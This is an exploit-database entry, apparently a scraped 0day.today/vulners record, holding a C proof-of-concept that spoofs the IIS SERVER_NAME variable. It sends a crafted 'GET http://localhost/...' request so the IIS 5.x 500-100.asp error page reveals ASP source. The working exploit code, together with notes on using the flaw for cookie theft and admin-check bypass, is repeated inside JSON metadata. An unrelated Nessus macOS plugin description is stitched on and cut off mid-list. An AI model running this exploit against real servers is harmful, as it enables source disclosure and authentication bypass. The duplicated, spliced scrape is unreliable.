MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit
2005-08-25T00:00:00
ID 1337DAY-ID-8604 Type zdt Reporter Lympex Modified 2005-08-25T00:00:00
Description
Exploit for unknown platform in category remote exploits
==========================================================
MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit
==========================================================
/*
====================================================================================
|| ## ####### ## ## ## ####### ####### ## ## ## ||
|| ## ## ## ## ## ######## ## ## ######## ## ## ||
|| ## ##### ######## ### ## ####### ####### ## #### ||
|| ## ## ## ## ## ## ## ### ## ## ## ||
|| ###### ####### ## ## ####### ####### ### ## ## ## ||
====================================================================================
Name: IIS 5.x and IIS 6.0 Server Name Spoof PoC
File: IIS_5.x_and_IIS_6.0_Server_Name_Spoof.c
Description: Proof of concept
Author: Lympex
Contact:
+ Web: http://l-bytes.tk
+ Mail: lympex[at]gmail[dot]com
Date: 25/08/2005
Extra: Compiled with Visual C++ 6.0
################################################################################################################
#Remote IIS 5.x and IIS 6.0 Server Name Spoof
#
#It is possible to remotely spoof the "SERVER_NAME" Microsoft? Internet Information Server? 5.0, 5.1 and 6.0
#server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the
#IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web
#applications and web services.
#
#Technical Description
#Microsoft? IIS 5.x ? shows sensitive information if the "SERVER_NAME" IIS 5.x server variable is "localhost".
#If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser,
#but only if"SERVER_NAME" IIS server variable is "localhost". One can spoof the "SERVER_NAME" IIS server
#variable so that it shows whatever one want. Other third party web applications or web services may also
#be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the
#spoof, but it's 500-100.asp page is not vulnerable.
#
#The IIS server variable that can be spoofed is the "SERVER_NAME", it can be accessed through
#request.servervariables("SERVER_NAME") with ASP, and HttpContext.Current.Request.ServerVariables("SERVER_NAME")
#with .NET, other programming languages have other methods to access this server variable, but are
#equally vulnerable.
#
#If the HTTP request comes from a remote client, then the server variable "SERVER_NAME" returns the IP
#address of the web server itself. If the HTTP request came from the same IP as the web server (thus the
#request came from the an authenticated user browsing from the web server itself), then
#request.servervariables("SERVER_NAME") returns "localhost". This fact is used as "proof" in web applications
#or web services that the person browsing the web server is in fact browsing from the web server itself.
#The web applications or web services may use this proof to display an administrative interface to the web
#browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the
#IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display
#the code where the error occurred.
#
#The technical description of the server variable is "The server's host name, DNS alias, or IP address as
#it would appear in self-referencing URLs", it is therefore often used to determine the IP address of the
#web server itself in once code, this opens up for a range of exploits including cookie-stealing, data
#redirection, and other URL manipulation issues.
#
#There are many other applications that utilize validity of this server variable, and MSDN holds many
#examples for developers that are easily exploitable with this bug; among the most serious are the
#Microsoft? .NET Passport SDK examples, any web application or web service based on these examples are
#probably vulnerable due to the bug.
################################################################################################################
*/
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
//max size to socket buffer
#define LEN_BUF 2048
//socket status
#define Conectado 1868
void main(int argc, char *argv[])
{
/*connect to a host throught a port*/
int Conecta(char *Host, short puerto);
//socket from the connection
int socket;
//to get the data received
char buf[LEN_BUF];
FILE *data;
printf("\n Proof of Concept");
printf("\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex");
printf("\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk");
printf("\n----------------------------------------------------\n");
if(argc!=4)
{
printf("\n[+] Usage: %s server.com 80 /test.asp\n",argv[0]);return;
}
//conectamos
socket=Conecta(argv[1],(short)atoi(argv[2]));
if(socket==-1)
{
printf("\n[+] Error connecting to host\n");
return;
}printf("\n[+] Connected!\n");
if((data=fopen("received_data.txt","w"))==NULL)
{
printf("\n[+] Error saving received data\n");
WSACleanup();
return;
}
/*send the EVIL REQUEST*/
strcpy(buf,"GET http://localhost");strcat(buf,argv[3]);strcat(buf," HTTP/1.0\n\n");
send(socket,buf,strlen(buf),0);
//while we aren?t disconnected
do
{
buf[recv(socket,buf,LEN_BUF,0)]='\0';
fputs(buf,data);
}while(socket==Conectado);
WSACleanup();
fclose(data);
printf("\n[+] Received data, saved in: \x22received_data.txt\x22\n");
return;
}
/*Connect to a host throught a port - by Lympex*/
int Conecta(char *Host, short puerto)
{
/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
/*estructura con los datos para realizar la conexion*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
//miramos si est? correcto, y as? no rellenamos la estructura Winsock_In para nada
if(Winsock==INVALID_SOCKET)
{
/*salimos*/
WSACleanup();
return -1;
}
/*rellenamos la estructura*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
/*conectamos*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*salimos*/
WSACleanup();
return -1;
}
return Winsock;
}
# 0day.today [2018-04-13] #
{"published": "2005-08-25T00:00:00", "id": "1337DAY-ID-8604", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:27:15", "bulletin": {"published": "2005-08-25T00:00:00", "id": "1337DAY-ID-8604", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.3, "modified": "2016-04-20T01:27:15", "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C/"}}, "hash": "8a8b616e483a61d1d85f790b9ad1ce0b6972a40c51a6c789c0f7b2b13fa47e39", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T01:27:15", "edition": 1, "title": "MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit", "href": "http://0day.today/exploit/description/8604", "modified": "2005-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/8604", "references": [], "reporter": "Lympex", "sourceData": "==========================================================\r\nMS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit\r\n==========================================================\r\n\r\n/*\r\n====================================================================================\r\n|| ## ####### ## ## ## ####### ####### ## ## ## ||\r\n|| ## ## ## ## ## ######## ## ## ######## ## ## ||\r\n|| ## ##### ######## ### ## ####### ####### ## #### ||\r\n|| ## ## ## ## ## ## ## ### ## ## ## ||\r\n|| ###### ####### ## ## ####### ####### ### ## ## ## ||\r\n====================================================================================\r\n\r\nName: IIS 5.x and IIS 6.0 Server Name Spoof PoC\r\nFile: IIS_5.x_and_IIS_6.0_Server_Name_Spoof.c\r\nDescription: Proof of concept\r\nAuthor: Lympex\r\nContact:\r\n+ Web: http://l-bytes.tk\r\n+ Mail: lympex[at]gmail[dot]com\r\nDate: 25/08/2005\r\nExtra: Compiled with Visual C++ 6.0\r\n\r\n\r\n################################################################################################################\r\n#Remote IIS 5.x and IIS 6.0 Server Name Spoof\r\n#\r\n#It is possible to remotely spoof the \"SERVER_NAME\" Microsoft? Internet Information Server? 5.0, 5.1 and 6.0 \r\n#server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the \r\n#IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web \r\n#applications and web services.\r\n#\r\n#Technical Description\r\n#Microsoft? IIS 5.x ? shows sensitive information if the \"SERVER_NAME\" IIS 5.x server variable is \"localhost\". \r\n#If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser, \r\n#but only if\"SERVER_NAME\" IIS server variable is \"localhost\". One can spoof the \"SERVER_NAME\" IIS server \r\n#variable so that it shows whatever one want. Other third party web applications or web services may also \r\n#be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the \r\n#spoof, but it's 500-100.asp page is not vulnerable.\r\n#\r\n#The IIS server variable that can be spoofed is the \"SERVER_NAME\", it can be accessed through \r\n#request.servervariables(\"SERVER_NAME\") with ASP, and HttpContext.Current.Request.ServerVariables(\"SERVER_NAME\") \r\n#with .NET, other programming languages have other methods to access this server variable, but are \r\n#equally vulnerable.\r\n#\r\n#If the HTTP request comes from a remote client, then the server variable \"SERVER_NAME\" returns the IP \r\n#address of the web server itself. If the HTTP request came from the same IP as the web server (thus the \r\n#request came from the an authenticated user browsing from the web server itself), then \r\n#request.servervariables(\"SERVER_NAME\") returns \"localhost\". This fact is used as \"proof\" in web applications\r\n#or web services that the person browsing the web server is in fact browsing from the web server itself. \r\n#The web applications or web services may use this proof to display an administrative interface to the web \r\n#browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the \r\n#IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display \r\n#the code where the error occurred.\r\n#\r\n#The technical description of the server variable is \"The server's host name, DNS alias, or IP address as \r\n#it would appear in self-referencing URLs\", it is therefore often used to determine the IP address of the \r\n#web server itself in once code, this opens up for a range of exploits including cookie-stealing, data \r\n#redirection, and other URL manipulation issues.\r\n#\r\n#There are many other applications that utilize validity of this server variable, and MSDN holds many \r\n#examples for developers that are easily exploitable with this bug; among the most serious are the \r\n#Microsoft? .NET Passport SDK examples, any web application or web service based on these examples are \r\n#probably vulnerable due to the bug.\r\n################################################################################################################\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n#pragma comment(lib,\"ws2_32.lib\")\r\n\r\n//max size to socket buffer\r\n#define LEN_BUF 2048\r\n//socket status\r\n#define Conectado 1868\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\t/*connect to a host throught a port*/\r\n\tint Conecta(char *Host, short puerto);\r\n\t//socket from the connection\r\n\tint socket;\r\n\t//to get the data received\r\n\tchar buf[LEN_BUF];\r\n\tFILE *data;\r\n\r\n\tprintf(\"\\n Proof of Concept\");\r\n\tprintf(\"\\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex\");\r\n\tprintf(\"\\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk\");\r\n\tprintf(\"\\n----------------------------------------------------\\n\");\r\n\r\n\tif(argc!=4)\r\n\t{\r\n\t\tprintf(\"\\n[+] Usage: %s server.com 80 /test.asp\\n\",argv[0]);return;\r\n\t}\r\n\r\n\t//conectamos\r\n\tsocket=Conecta(argv[1],(short)atoi(argv[2]));\r\n\r\n\tif(socket==-1)\r\n\t{\r\n\t\tprintf(\"\\n[+] Error connecting to host\\n\");\r\n\t\treturn;\r\n\t}printf(\"\\n[+] Connected!\\n\");\r\n\r\n\tif((data=fopen(\"received_data.txt\",\"w\"))==NULL)\r\n\t{\r\n\t\tprintf(\"\\n[+] Error saving received data\\n\");\r\n\t\tWSACleanup();\r\n\t\treturn;\r\n\t}\r\n\r\n\t/*send the EVIL REQUEST*/\r\n\tstrcpy(buf,\"GET http://localhost\");strcat(buf,argv[3]);strcat(buf,\" HTTP/1.0\\n\\n\");\r\n\tsend(socket,buf,strlen(buf),0);\r\n\r\n\t//while we aren?t disconnected\r\n\tdo\r\n\t{\r\n\t\tbuf[recv(socket,buf,LEN_BUF,0)]='\\0';\r\n\t\tfputs(buf,data);\r\n\t}while(socket==Conectado);\r\n\r\n\tWSACleanup();\r\n\tfclose(data);\r\n\tprintf(\"\\n[+] Received data, saved in: \\x22received_data.txt\\x22\\n\");\r\n\treturn;\r\n}\r\n\r\n/*Connect to a host throught a port - by Lympex*/\r\nint Conecta(char *Host, short puerto)\r\n{\r\n\t/*para crear el socket*/\r\n\tWSADATA wsaData;\r\n\tSOCKET Winsock;//el que escucha\r\n\t/*estructura con los datos para realizar la conexion*/\r\n\tstruct sockaddr_in Winsock_In;\r\n\tstruct hostent *Ip;\r\n\r\n\t/*iniciamos el socket*/\r\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\r\n\t/*asociamos*/\r\n\tWinsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);\r\n\t\r\n\t//miramos si est? correcto, y as? no rellenamos la estructura Winsock_In para nada\r\n\tif(Winsock==INVALID_SOCKET)\r\n\t{\r\n\t\t/*salimos*/\r\n\t\tWSACleanup();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/*rellenamos la estructura*/\r\n\tIp=gethostbyname(Host);\r\n\tWinsock_In.sin_port=htons(puerto);\r\n\tWinsock_In.sin_family=AF_INET;\r\n\tWinsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));\r\n\r\n\t/*conectamos*/\r\n\tif(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\r\n\t{\r\n\t\t/*salimos*/\r\n\t\tWSACleanup();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\treturn Winsock;\r\n}\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6feed823ade59de6bc18804ca6c5ba2b", "key": "href"}, {"hash": "1aa262630785d0ace07a33ad7829b093", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "4775f4a0ea8450d9e86f13014d4144b3", "key": "sourceHref"}, {"hash": "4e970d4ec75b4861057fc4fa42b21b3d", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1aa262630785d0ace07a33ad7829b093", "key": "modified"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "17f20154929f186dacab2cd0712444d3", "key": "sourceData"}, {"hash": "57084e59129b5d26475aa6f9a2ffefd7", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "7b2947622ea6edbcb0e89a3f138d7c3d4659d06390da006eb1b1f6db7c80b9f6", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-04-13T07:49:53"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310814888", "OPENVAS:1361412562310807562", "OPENVAS:1361412562310807559", "OPENVAS:1361412562310131194"]}, {"type": "cve", "idList": ["CVE-2017-8601"]}, {"type": "kaspersky", "idList": ["KLA11070"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201607-05.NASL", "OPENSUSE-2016-199.NASL", "OPENSUSE-2016-198.NASL", "OPENSUSE-2016-201.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201607-05"]}, {"type": "archlinux", "idList": ["ASA-201602-24"]}, {"type": "zdt", "idList": ["1337DAY-ID-1868"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:11757", "SECURITYVULNS:DOC:8604", "SECURITYVULNS:VULN:4788"]}], "modified": "2018-04-13T07:49:53"}, "vulnersScore": 7.2}, "type": "zdt", "lastseen": "2018-04-13T07:49:53", "edition": 2, "title": "MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit", "href": "https://0day.today/exploit/description/8604", "modified": "2005-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/8604", "references": [], "reporter": "Lympex", "sourceData": "==========================================================\r\nMS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit\r\n==========================================================\r\n\r\n/*\r\n====================================================================================\r\n|| ## ####### ## ## ## ####### ####### ## ## ## ||\r\n|| ## ## ## ## ## ######## ## ## ######## ## ## ||\r\n|| ## ##### ######## ### ## ####### ####### ## #### ||\r\n|| ## ## ## ## ## ## ## ### ## ## ## ||\r\n|| ###### ####### ## ## ####### ####### ### ## ## ## ||\r\n====================================================================================\r\n\r\nName: IIS 5.x and IIS 6.0 Server Name Spoof PoC\r\nFile: IIS_5.x_and_IIS_6.0_Server_Name_Spoof.c\r\nDescription: Proof of concept\r\nAuthor: Lympex\r\nContact:\r\n+ Web: http://l-bytes.tk\r\n+ Mail: lympex[at]gmail[dot]com\r\nDate: 25/08/2005\r\nExtra: Compiled with Visual C++ 6.0\r\n\r\n\r\n################################################################################################################\r\n#Remote IIS 5.x and IIS 6.0 Server Name Spoof\r\n#\r\n#It is possible to remotely spoof the \"SERVER_NAME\" Microsoft? Internet Information Server? 5.0, 5.1 and 6.0 \r\n#server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the \r\n#IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web \r\n#applications and web services.\r\n#\r\n#Technical Description\r\n#Microsoft? IIS 5.x ? shows sensitive information if the \"SERVER_NAME\" IIS 5.x server variable is \"localhost\". \r\n#If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser, \r\n#but only if\"SERVER_NAME\" IIS server variable is \"localhost\". One can spoof the \"SERVER_NAME\" IIS server \r\n#variable so that it shows whatever one want. Other third party web applications or web services may also \r\n#be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the \r\n#spoof, but it's 500-100.asp page is not vulnerable.\r\n#\r\n#The IIS server variable that can be spoofed is the \"SERVER_NAME\", it can be accessed through \r\n#request.servervariables(\"SERVER_NAME\") with ASP, and HttpContext.Current.Request.ServerVariables(\"SERVER_NAME\") \r\n#with .NET, other programming languages have other methods to access this server variable, but are \r\n#equally vulnerable.\r\n#\r\n#If the HTTP request comes from a remote client, then the server variable \"SERVER_NAME\" returns the IP \r\n#address of the web server itself. If the HTTP request came from the same IP as the web server (thus the \r\n#request came from the an authenticated user browsing from the web server itself), then \r\n#request.servervariables(\"SERVER_NAME\") returns \"localhost\". This fact is used as \"proof\" in web applications\r\n#or web services that the person browsing the web server is in fact browsing from the web server itself. \r\n#The web applications or web services may use this proof to display an administrative interface to the web \r\n#browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the \r\n#IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display \r\n#the code where the error occurred.\r\n#\r\n#The technical description of the server variable is \"The server's host name, DNS alias, or IP address as \r\n#it would appear in self-referencing URLs\", it is therefore often used to determine the IP address of the \r\n#web server itself in once code, this opens up for a range of exploits including cookie-stealing, data \r\n#redirection, and other URL manipulation issues.\r\n#\r\n#There are many other applications that utilize validity of this server variable, and MSDN holds many \r\n#examples for developers that are easily exploitable with this bug; among the most serious are the \r\n#Microsoft? .NET Passport SDK examples, any web application or web service based on these examples are \r\n#probably vulnerable due to the bug.\r\n################################################################################################################\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n#pragma comment(lib,\"ws2_32.lib\")\r\n\r\n//max size to socket buffer\r\n#define LEN_BUF 2048\r\n//socket status\r\n#define Conectado 1868\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\t/*connect to a host throught a port*/\r\n\tint Conecta(char *Host, short puerto);\r\n\t//socket from the connection\r\n\tint socket;\r\n\t//to get the data received\r\n\tchar buf[LEN_BUF];\r\n\tFILE *data;\r\n\r\n\tprintf(\"\\n Proof of Concept\");\r\n\tprintf(\"\\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex\");\r\n\tprintf(\"\\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk\");\r\n\tprintf(\"\\n----------------------------------------------------\\n\");\r\n\r\n\tif(argc!=4)\r\n\t{\r\n\t\tprintf(\"\\n[+] Usage: %s server.com 80 /test.asp\\n\",argv[0]);return;\r\n\t}\r\n\r\n\t//conectamos\r\n\tsocket=Conecta(argv[1],(short)atoi(argv[2]));\r\n\r\n\tif(socket==-1)\r\n\t{\r\n\t\tprintf(\"\\n[+] Error connecting to host\\n\");\r\n\t\treturn;\r\n\t}printf(\"\\n[+] Connected!\\n\");\r\n\r\n\tif((data=fopen(\"received_data.txt\",\"w\"))==NULL)\r\n\t{\r\n\t\tprintf(\"\\n[+] Error saving received data\\n\");\r\n\t\tWSACleanup();\r\n\t\treturn;\r\n\t}\r\n\r\n\t/*send the EVIL REQUEST*/\r\n\tstrcpy(buf,\"GET http://localhost\");strcat(buf,argv[3]);strcat(buf,\" HTTP/1.0\\n\\n\");\r\n\tsend(socket,buf,strlen(buf),0);\r\n\r\n\t//while we aren?t disconnected\r\n\tdo\r\n\t{\r\n\t\tbuf[recv(socket,buf,LEN_BUF,0)]='\\0';\r\n\t\tfputs(buf,data);\r\n\t}while(socket==Conectado);\r\n\r\n\tWSACleanup();\r\n\tfclose(data);\r\n\tprintf(\"\\n[+] Received data, saved in: \\x22received_data.txt\\x22\\n\");\r\n\treturn;\r\n}\r\n\r\n/*Connect to a host throught a port - by Lympex*/\r\nint Conecta(char *Host, short puerto)\r\n{\r\n\t/*para crear el socket*/\r\n\tWSADATA wsaData;\r\n\tSOCKET Winsock;//el que escucha\r\n\t/*estructura con los datos para realizar la conexion*/\r\n\tstruct sockaddr_in Winsock_In;\r\n\tstruct hostent *Ip;\r\n\r\n\t/*iniciamos el socket*/\r\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\r\n\t/*asociamos*/\r\n\tWinsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);\r\n\t\r\n\t//miramos si est? correcto, y as? no rellenamos la estructura Winsock_In para nada\r\n\tif(Winsock==INVALID_SOCKET)\r\n\t{\r\n\t\t/*salimos*/\r\n\t\tWSACleanup();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/*rellenamos la estructura*/\r\n\tIp=gethostbyname(Host);\r\n\tWinsock_In.sin_port=htons(puerto);\r\n\tWinsock_In.sin_family=AF_INET;\r\n\tWinsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));\r\n\r\n\t/*conectamos*/\r\n\tif(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\r\n\t{\r\n\t\t/*salimos*/\r\n\t\tWSACleanup();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\treturn Winsock;\r\n}\r\n\r\n\n# 0day.today [2018-04-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "4e9108621211286aff90709b411e5c08", "key": "href"}, {"hash": "1aa262630785d0ace07a33ad7829b093", "key": "modified"}, {"hash": "1aa262630785d0ace07a33ad7829b093", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57084e59129b5d26475aa6f9a2ffefd7", "key": "reporter"}, {"hash": "484623dba088008cce93b98e5e837011", "key": "sourceData"}, {"hash": "a186a55726ff11e6c434f0e911447222", "key": "sourceHref"}, {"hash": "4e970d4ec75b4861057fc4fa42b21b3d", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"nessus": [{"lastseen": "2019-11-03T11:31:08", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.5. It is, therefore, affected \nby multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616, \n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604,CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, \n CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, \n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system", "modified": "2019-11-02T00:00:00", "id": "MACOS_10_14_5.NASL", "href": "https://www.tenable.com/plugins/nessus/125150", "published": "2019-05-15T00:00:00", "title": "macOS 10.14.x < 10.14.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125150);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/01 9:03:02\");\n\n script_cve_id(\n \"CVE-2018-4456\",\n \"CVE-2019-6237\",\n \"CVE-2019-8560\",\n \"CVE-2019-8568\",\n \"CVE-2019-8569\",\n \"CVE-2019-8571\",\n \"CVE-2019-8574\",\n \"CVE-2019-8576\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8585\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8589\",\n \"CVE-2019-8590\",\n \"CVE-2019-8591\",\n \"CVE-2019-8592\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8603\",\n \"CVE-2019-8604\",\n \"CVE-2019-8605\",\n \"CVE-2019-8606\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8616\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\",\n \"CVE-2019-8629\",\n \"CVE-2019-8634\",\n \"CVE-2019-8635\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210119\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n script_xref(name:\"IAVA\", value:\"2019-A-0401\");\n\n script_name(english:\"macOS 10.14.x < 10.14.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing a macOS update that fixes multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.5. It is, therefore, affected \nby multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616, \n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604,CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, \n 